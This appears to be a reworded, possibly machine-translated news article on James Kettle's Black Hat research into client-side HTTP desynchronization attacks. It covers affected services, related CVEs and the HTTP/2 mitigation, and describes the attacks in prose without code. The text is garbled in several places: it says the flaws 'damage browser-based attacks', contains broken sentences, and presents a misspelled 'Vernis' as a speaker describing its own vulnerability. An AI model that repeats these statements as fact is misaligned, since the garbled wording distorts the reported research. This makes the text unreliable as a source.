BLACK HAT USA – LAS VEGAS – A security researcher who previously demonstrated how attackers can exploit weaknesses in how websites handle HTTP requests has warned that the same issues can be used to damage browser-based attacks against users.
James Kettle, director of PortSwigger, described his research as shedding new light on so-called desynchronization attacks that exploit mismatches in how a website’s back-end and front-end servers interpret HTTP requests. Previously, at Black Hat USA 2019, Kettle showed how attackers could trigger these disagreements – over things like message length, for example – to route HTTP requests to a back-end component of their choosing, stealing user information. identifying and invoking unexpected responses from an application and other malicious actions. Kettle has also previously shown how HTTP/2 implementation errors can put websites at risk of compromise.
Kettle’s new research focuses on how threat actors can exploit the same issues with improper HTTP request processing to also attack website users and steal credentials, install backdoors and compromise their websites. systems in other ways. Kettle said he has identified HTTP handling anomalies that allow such client-side desynchronization attacks on sites such as Amazon.com, those using the AWS Application Load Balancer, Cisco ASA WebVPN, Akamai, Varnish servers Cache and Apache HTTP Server 2.4.52 and earlier.
The main difference between server-side desynchronization attacks and client-side desynchronization attacks is that the former requires attacker-controlled systems with a reverse proxy and at least partially malformed requests, Kettle said in a conversation with Dark Reading after his presentation. A browser-powered attack takes place inside the victim’s web browser, using legitimate requests, he said. Kettle showed a proof of concept where he was able to store information such as random user authentication tokens on Amazon in his shopping list as an example of what an attacker would be able to do. Kettle found that he could have tricked every infected victim on Amazon’s site into re-launching the attack on others.
“This would have released a desync worm – a self-replicating attack that exploits victims to infect others without user interaction, rapidly exploiting every active user on Amazon,” Kettle said. Amazon has since fixed the issue.
Cisco has opened a CVE for the vulnerability (CVE-2022-20713) after Kettle informed the company and described the issue as allowing an unauthenticated remote attacker to carry out browser-based attacks against website users. “An attacker could exploit this vulnerability by convincing a targeted user to visit a website capable of transmitting malicious requests to an ASA device that has the Clientless SSL VPN feature enabled,” the company noted. “A successful exploit could allow the attacker to conduct browser-based attacks, including cross-site scripting attacks, against the targeted user.”
Apache has identified its HTTP request smuggling vulnerability (CVE-2022-22720) as related to a failure “to close the incoming connection when errors are encountered while deleting the request body”. Vernis described his vulnerability (CVE-2022-23959) as allowing attackers to inject fake responses on client connections.
In a white paper released todayKettle said there are two distinct scenarios in which HTTP processing anomalies could have security implications,
One was first request validation, where front-end servers that handle HTTP requests use the Host header to identify the backend to route each request to. These proxy servers often have a whitelist of hosts that users are allowed to access. What Kettle discovered is that some front-end or proxy servers only use the whitelist for the first request sent over a connection and not for subsequent requests sent over the same connection. Thus, attackers can abuse it to gain access to a target component by first sending a request to an authorized destination and then sending a request to their target destination.
Another closely related but much more common problem encountered by Kettle stems from first-request routing. With first-request routing, the front-end or proxy server examines the Host header of the HTTP request to decide where to route the request, and then routes all subsequent client requests to the same back-end server. In environments where the Host header is handled insecurely, this provides attackers with the ability to target any back-end component to carry out various attacks, Kettle said.
The best way for websites to mitigate client-side desynchronization attacks is to use end-to-end HTTP/2, Kettle said. It’s generally not a good idea to have a front-end that supports HTTP/2 and a back-end that is HTTP/1.1. “If your company routes employee traffic through a forward proxy, make sure upstream HTTP/2 is supported and enabled,” Kettle advised. “Please note that the use of forward proxies also introduces a range of additional request smuggling risks beyond the scope of this article.”